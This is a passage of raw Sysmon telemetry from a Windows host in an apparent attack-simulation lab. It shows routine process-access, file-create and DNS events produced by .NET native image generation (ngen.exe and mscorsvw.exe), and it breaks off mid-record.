13:24:39.255{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4617-6000-6603-000000009A01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.161{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4617-6000-6503-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.146{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4617-6000-6503-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.146{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4617-6000-6503-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:39.083{08A6967A-4616-6000-6403-000000009A01}3832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ef8-0\System.Net.Http.dll2021-01-14 13:24:39.083 10341000x80000000000000007573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.630{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4618-6000-6C03-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.630{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4618-6000-6C03-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.630{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4618-6000-6C03-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 22542200x80000000000000007570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.010{08A6967A-4286-6000-0B00-000000009A01}852win-dc-250.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000007569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.010{08A6967A-4286-6000-0B00-000000009A01}852win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;C:\Windows\System32\lsass.exe 10341000x80000000000000007568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.505{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4618-6000-6B03-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.489{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4618-6000-6B03-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.489{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4618-6000-6B03-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:40.427{08A6967A-4618-6000-6A03-000000009A01}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\127c-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-01-14 13:24:40.427 10341000x80000000000000007564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.365{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4618-6000-6A03-000000009A01}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.349{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4618-6000-6A03-000000009A01}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.349{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4618-6000-6A03-000000009A01}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4618-6000-6903-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.302{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4618-6000-6903-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:40.302{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4618-6000-6903-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:40.224{08A6967A-4617-6000-6803-000000009A01}2972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b9c-0\System.Runtime.WindowsRuntime.dll2021-01-14 13:24:40.224 10341000x80000000000000007580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:42.990{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-461A-6000-6E03-000000009A01}3148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:42.974{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-461A-6000-6E03-000000009A01}3148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:42.974{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-461A-6000-6E03-000000009A01}3148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:42.255{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-461A-6000-6D03-000000009A01}4976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:42.240{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-461A-6000-6D03-000000009A01}4976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:42.240{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-461A-6000-6D03-000000009A01}4976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.303